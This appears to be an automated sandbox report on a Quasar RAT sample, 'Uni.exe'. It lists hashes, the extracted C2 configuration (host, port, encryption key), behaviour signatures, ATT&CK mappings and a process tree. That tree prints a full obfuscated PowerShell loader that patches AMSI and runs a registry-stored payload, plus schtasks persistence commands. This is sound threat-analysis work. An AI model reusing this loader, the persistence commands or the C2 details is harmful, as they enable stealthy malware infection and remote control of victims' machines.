Analysis

  • max time kernel
    1800s
  • max time network
    1781s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-05-2024 17:26

General

  • Target

    Uni.exe

  • Size

    409KB

  • MD5

    7417c8c73e614f293152575f46134216

  • SHA1

    cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

  • SHA256

    00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

  • SHA512

    897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

  • SSDEEP

    6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-dOMA5C0pQTTpKjVsCp

Attributes
  • encryption_key

    UBXs44u6E81wxBGZxQHk

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-KEYLOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 19 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:632
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:388
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{d4ae4e9a-630d-4915-ad57-8d150ef78d5b}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3904
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:684
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:968
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:752
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:992
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                • Drops file in System32 directory
                PID:1104
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                • Drops file in System32 directory
                PID:1112
                • C:\Windows\system32\taskhostw.exe
                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                  2⤵
                    PID:2720
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kvAPimlmJWAW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jHOzUHacBApruo,[Parameter(Position=1)][Type]$bMiVRqnhmS)$TjmHNStoaaY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+'d'+'D'+''+'e'+''+[Char](108)+''+'e'+'g'+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'m'+'o'+''+[Char](114)+'yM'+[Char](111)+'d'+'u'+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'l'+'e'+''+[Char](103)+''+'a'+'t'+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+'e'+''+'a'+'l'+'e'+''+'d'+''+','+''+'A'+''+[Char](110)+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+'t'+''+[Char](111)+'Cl'+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$TjmHNStoaaY.DefineConstructor('R'+[Char](84)+'Sp'+[Char](101)+'c'+'i'+''+[Char](97)+''+[Char](108)+''+'N'+'am'+'e'+''+','+''+[Char](72)+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$jHOzUHacBApruo).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$TjmHNStoaaY.DefineMethod('In'+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'H'+'i'+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+','+'N'+''+'e'+'w'+'S'+''+[Char](108)+'o'+'t'+',V'+[Char](105)+''+'r'+'tu'+[Char](97)+''+[Char](108)+'',$bMiVRqnhmS,$jHOzUHacBApruo).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+',M'+'a'+'na'+[Char](103)+''+'e'+'d');Write-Output $TjmHNStoaaY.CreateType();}$cepVnKtpxSbaZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+'t'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+'s'+'o'+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'a'+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+'M'+''+[Char](101)+'th'+'o'+''+[Char](100)+''+'s'+'');$vYBERiVtTYMkQY=$cepVnKtpxSbaZ.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+'P'+'ro'+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+',S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RyGhMaIajdfmkmCHEWU=kvAPimlmJWAW @([String])([IntPtr]);$IgHVwEWtIyXwdOWpodVzqd=kvAPimlmJWAW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CuUWcNabmLD=$cepVnKtpxSbaZ.GetMethod(''+[Char](71)+'e'+'t'+'M'+[Char](111)+'du'+[Char](108)+''+[Char](101)+''+'H'+'a'+'n'+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+'2'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$HoKNTkmWrzUHKp=$vYBERiVtTYMkQY.Invoke($Null,@([Object]$CuUWcNabmLD,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+'L'+[Char](105)+''+[Char](98)+'ra'+'r'+''+'y'+''+[Char](65)+'')));$TqgoEeqYUVDslfxlw=$vYBERiVtTYMkQY.Invoke($Null,@([Object]$CuUWcNabmLD,[Object](''+'V'+''+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$mbcEfwV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HoKNTkmWrzUHKp,$RyGhMaIajdfmkmCHEWU).Invoke('a'+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$yBbizoEkOiZmNKDUG=$vYBERiVtTYMkQY.Invoke($Null,@([Object]$mbcEfwV,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+'e'+'r')));$gmeDBRhMHj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TqgoEeqYUVDslfxlw,$IgHVwEWtIyXwdOWpodVzqd).Invoke($yBbizoEkOiZmNKDUG,[uint32]8,4,[ref]$gmeDBRhMHj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$yBbizoEkOiZmNKDUG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TqgoEeqYUVDslfxlw,$IgHVwEWtIyXwdOWpodVzqd).Invoke($yBbizoEkOiZmNKDUG,[uint32]8,0x20,[ref]$gmeDBRhMHj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+'T'+''+'W'+'AR'+[Char](69)+'').GetValue('$'+[Char](55)+'7'+'s'+'ta'+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                    2⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Drops file in System32 directory
                    • Suspicious use of SetThreadContext
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4568
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1152
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1160
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1284
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1292
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1340
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1416
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2480
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1424
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1548
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1556
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1648
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1692
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1744
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1764
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1824
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1884
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1892
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1968
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1996
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:1440
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2144
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2160
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2332
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2500
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2516
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                  1⤵
                                                                    PID:2524
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2672
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2744
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2760
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2780
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2796
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                            1⤵
                                                                              PID:2820
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3092
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3396
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of UnmapMainImage
                                                                                  PID:3504
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Uni.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\Uni.exe"
                                                                                    2⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2616
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
                                                                                      3⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:2448
                                                                                    • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1840
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                        4⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:2648
                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4160
                                                                                    • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                      "SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
                                                                                      3⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:4604
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                  1⤵
                                                                                    PID:3668
                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                    1⤵
                                                                                      PID:3860
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      • Suspicious use of UnmapMainImage
                                                                                      PID:4024
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                      • Suspicious use of UnmapMainImage
                                                                                      PID:3916
                                                                                    • C:\Windows\system32\SppExtComObj.exe
                                                                                      C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                      1⤵
                                                                                        PID:4480
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                        1⤵
                                                                                          PID:4596
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                          1⤵
                                                                                            PID:4948
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                            1⤵
                                                                                              PID:1912
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                              1⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:3264
                                                                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                              1⤵
                                                                                              • Drops file in System32 directory
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:1468
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                              1⤵
                                                                                                PID:4940
                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                1⤵
                                                                                                • Drops file in System32 directory
                                                                                                PID:2204
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                • Suspicious use of UnmapMainImage
                                                                                                PID:5100
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:2112
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                  • Modifies registry class
                                                                                                  PID:1784
                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                  1⤵
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Enumerates system info in registry
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:3020
                                                                                                • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                  C:\Windows\System32\WaaSMedicAgent.exe a7821ccb2313c6d231b0cb4062f17041 BdYmhD9fzUKQGFZ9y/oFwA.0.1.0.0.0
                                                                                                  1⤵
                                                                                                  • Sets service image path in registry
                                                                                                  PID:1400
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    2⤵
                                                                                                      PID:4648
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                    1⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    PID:1576
                                                                                                  • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
                                                                                                    1⤵
                                                                                                      PID:4744
                                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                                      1⤵
                                                                                                        PID:2976
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                        1⤵
                                                                                                        • Checks processor information in registry
                                                                                                        PID:4412
                                                                                                      • C:\Windows\System32\mousocoreworker.exe
                                                                                                        C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                        1⤵
                                                                                                        • Checks processor information in registry
                                                                                                        • Enumerates system info in registry
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:4772
                                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                        1⤵
                                                                                                          PID:3644
                                                                                                        • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                          1⤵
                                                                                                            PID:3492
                                                                                                          • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                            "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                            1⤵
                                                                                                              PID:1120
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                              1⤵
                                                                                                                PID:5088
                                                                                                              • C:\Windows\System32\mousocoreworker.exe
                                                                                                                C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                1⤵
                                                                                                                • Checks processor information in registry
                                                                                                                • Enumerates system info in registry
                                                                                                                PID:2232
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                • Modifies registry class
                                                                                                                PID:1048
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:4464
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                  1⤵
                                                                                                                    PID:2056

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                  Execution

                                                                                                                  Scheduled Task/Job

                                                                                                                  1
                                                                                                                  T1053

                                                                                                                  Persistence

                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                  1
                                                                                                                  T1547

                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                  1
                                                                                                                  T1547.001

                                                                                                                  Scheduled Task/Job

                                                                                                                  1
                                                                                                                  T1053

                                                                                                                  Privilege Escalation

                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                  1
                                                                                                                  T1547

                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                  1
                                                                                                                  T1547.001

                                                                                                                  Scheduled Task/Job

                                                                                                                  1
                                                                                                                  T1053

                                                                                                                  Defense Evasion

                                                                                                                  Modify Registry

                                                                                                                  1
                                                                                                                  T1112

                                                                                                                  Discovery

                                                                                                                  Query Registry

                                                                                                                  5
                                                                                                                  T1012

                                                                                                                  System Information Discovery

                                                                                                                  4
                                                                                                                  T1082

                                                                                                                  Peripheral Device Discovery

                                                                                                                  1
                                                                                                                  T1120

                                                                                                                  Command and Control

                                                                                                                  Web Service

                                                                                                                  1
                                                                                                                  T1102

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                    Filesize

                                                                                                                    330B

                                                                                                                    MD5

                                                                                                                    5e4e03e0b9689d88990bb753aa99da43

                                                                                                                    SHA1

                                                                                                                    45672952a849323b8755969be6a70dc0824a9a76

                                                                                                                    SHA256

                                                                                                                    b68e9c5bf34d9147d6d9a046a3dc3e3b174ceff22d28d99c4563c00664d82b65

                                                                                                                    SHA512

                                                                                                                    f77fdb8903ce3d31f5d7626e464966fd6bff22c2dd13f450b37ede2646a8388b1d3e43b51e9ab18c8de318d6d9839c76621ce1da22f640b637c0bff544a967d6

                                                                                                                  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
                                                                                                                    Filesize

                                                                                                                    330B

                                                                                                                    MD5

                                                                                                                    ba609c2f8e6c0c4890a517a466735011

                                                                                                                    SHA1

                                                                                                                    a515535b181a0d6e8dccc74faa4309f551eafee3

                                                                                                                    SHA256

                                                                                                                    f2b9c62337bdead132109c22e7f8b5fa61faddf3274e79341e292618416fd476

                                                                                                                    SHA512

                                                                                                                    470e4732e9ef0bfa49bfad2159bf5c4a0696a11e133763a8da53437494cfb004ad7e8516d040557e6f912a85d9c25743bffc0b82d108f1ff46037ee9dd01eee2

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                    Filesize

                                                                                                                    162KB

                                                                                                                    MD5

                                                                                                                    152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                    SHA1

                                                                                                                    c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                    SHA256

                                                                                                                    a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                    SHA512

                                                                                                                    2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

